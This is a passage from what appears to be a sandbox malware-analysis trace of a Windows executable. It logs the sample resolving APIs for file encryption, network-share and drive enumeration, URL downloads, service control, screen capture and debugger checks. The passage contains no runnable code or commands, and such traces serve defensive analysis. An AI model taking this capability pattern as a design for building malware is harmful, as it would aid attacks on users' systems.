dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0119.326] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f80000 [0119.385] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18ed78 | out: lpflOldProtect=0x18ed78*=0x2) returned 1 [0119.832] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0119.832] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0119.832] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0119.833] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0119.833] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0119.833] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0119.833] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0119.836] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0119.836] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0119.836] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0119.836] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0119.852] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0119.852] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0119.852] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0119.852] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0119.852] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0119.852] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0119.853] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0119.853] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0119.856] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0119.856] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0119.857] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0119.857] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0119.857] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0119.857] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0119.857] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0119.857] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0119.857] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0119.857] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0119.858] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0119.859] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0119.860] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0119.860] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0119.860] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0119.860] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0119.860] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0119.860] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0119.860] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0119.861] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0119.862] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0119.863] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0119.864] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0119.865] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0119.866] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0119.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0119.868] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0119.869] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0119.870] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0119.871] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0119.872] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0119.872] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0119.872] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0119.872] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0119.872] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0119.872] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0119.872] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0119.872] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0119.872] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0119.872] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0119.873] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0119.874] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0119.874] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0119.875] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0119.876] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0119.877] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0119.877] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0119.877] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0119.877] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0119.877] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0119.880] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0119.881] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0119.881] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0119.881] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0119.881] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0119.881] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0119.881] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0119.881] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0119.881] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0119.881] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0119.882] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0119.882] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0119.882] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0119.883] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0119.888] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0119.888] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0119.891] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0119.891] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0119.891] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0119.891] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0119.896] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0119.896] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0119.896] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0119.896] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0119.896] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0119.897] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0119.897] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0119.897] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0119.897] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0119.897] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0119.897] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0119.897] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0119.898] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0119.898] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0119.898] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0119.898] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0119.905] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0119.906] atexit (param_1=0x720920) returned 0 [0119.914] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ed88 | out: lpSystemTimeAsFileTime=0x18ed88*(dwLowDateTime=0xbf6ad350, dwHighDateTime=0x1d62438)) [0119.914] GetCurrentThreadId () returned 0x968 [0119.914] GetCurrentProcessId () returned 0x958 [0119.914] QueryPerformanceCounter (in: lpPerformanceCount=0x18ed80 | out: lpPerformanceCount=0x18ed80*=24033824055) returned 1 [0119.964] GetStartupInfoW (in: lpStartupInfo=0x18ed18 | out: lpStartupInfo=0x18ed18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0119.978] GetProcessHeap () returned 0x620000 [0120.085] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0120.085] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0120.085] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0120.085] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0120.085] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0120.085] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0120.086] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0120.087] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0120.088] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0120.089] GetProcAddress 